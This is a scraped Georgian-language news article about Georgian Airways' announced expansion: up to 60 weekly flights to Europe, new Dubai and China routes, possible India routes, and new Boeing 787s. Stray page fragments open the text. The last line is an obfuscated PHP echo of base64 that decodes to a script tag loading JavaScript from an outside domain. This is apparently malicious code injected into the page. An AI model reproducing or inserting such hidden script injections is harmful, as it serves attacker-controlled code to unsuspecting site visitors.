celsiusi
ავერსი შნაიდერი

„ჯორჯიან ეარვეისი“ ევროპაში კვირაში 60-მდე რეისს ამატებს - ამის შესახებ კომპანიის მიერ გავრცელებულ განცხადებაშია აღნიშნული.

კომპანიაში აცხადებენ, რომ დუბაისა და ჩინეთში სამი მიმართულებით ფრენებს დაიწყებს.

„ჯორჯიან ეარვეისის“ დირექტორატი, მათ შორის, თამაზ გაიაშვილი მოხარულია, რომ საქართველო ევროკავშირის კანდიდატი ქვეყნის სტატუსი მიენიჭება, რაც დღე-დღეზე გადაწყდება. ამასთან დაკავშირებით ავიაკომპანიამ ქვეყნისთვის სტრატეგიული მნიშვნელობის მქონე გადაწყვეტილება მიიღო - მაქსიმალურად გაზარდოს ფრენები ევროპის მიმართულებებზე, მათ შორის, ყველა დედაქალაქში, პირველ რიგში, რა თქმა უნდა, ბრიუსელში.

მიმდინარე წელს ბევრი ახალი მიმართულება იქნა ათვისებული, მაგრამ „ჯორჯიან ეარვეისი“ მგზავრთა საყურადღებოდ აცხადებს, რომ მომავალი წლიდან ევროპის მიმართულებით კვირაში 60 რეისამდე დაგვემატება. თითოეულ მიმართულებაზე კვირაში არანაკლებ სამი რეისი შესრულდება.

ამასთანავე, „ჯორჯიან ეარვეისი“ მიმდინარე წლის ბოლოდან ფრენებს დუბაიში, მომავალი წლის აპრილიდან კი ჩინეთში (პეკინი, შანხაი, ჩენდუ) იწყებს. ამ მიმართულებებზეც კვირაში სულ ცოტა სამ-სამი რეისი შესრულდება“, - ნათქვამია კომპანიის განცხადებაში.

კომპანიაში აცხადებენ, რომ ასევე განიხილება ინდოეთის მიმართულებები, როგორიც არის დელი და მუმბაი.

„ჯორჯიან ეარვეისის“ ხელმძღვანელობა აცხადებს, რომ მისთვის მთავარი პრიორიტეტი ბუნებრივია, მგზავრთა კომფორტულ მომსახურებასთან ერთად, ფრენების უსაფრთხოებაა.

ზემოთ აღნიშნულ მიმართულებებზე ყველა რეისი შესრულდება მხოლოდ დღის საათებში, იშვიათი გამონაკლისი შესაძლებელია იყოს მხოლოდ ზოგიერთი აღმოსავლური მიმართულება“, - ნათქვამია განცხადებაში.

მათივე ცნობით, „ჯორჯიან ეარვეისი“ მომავალი წლიდან თანამედროვე ახალ თვითმფრინავებს ამატებს, როგორიცაა „ბოინგი 787 დრიმლაინერი“.

238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");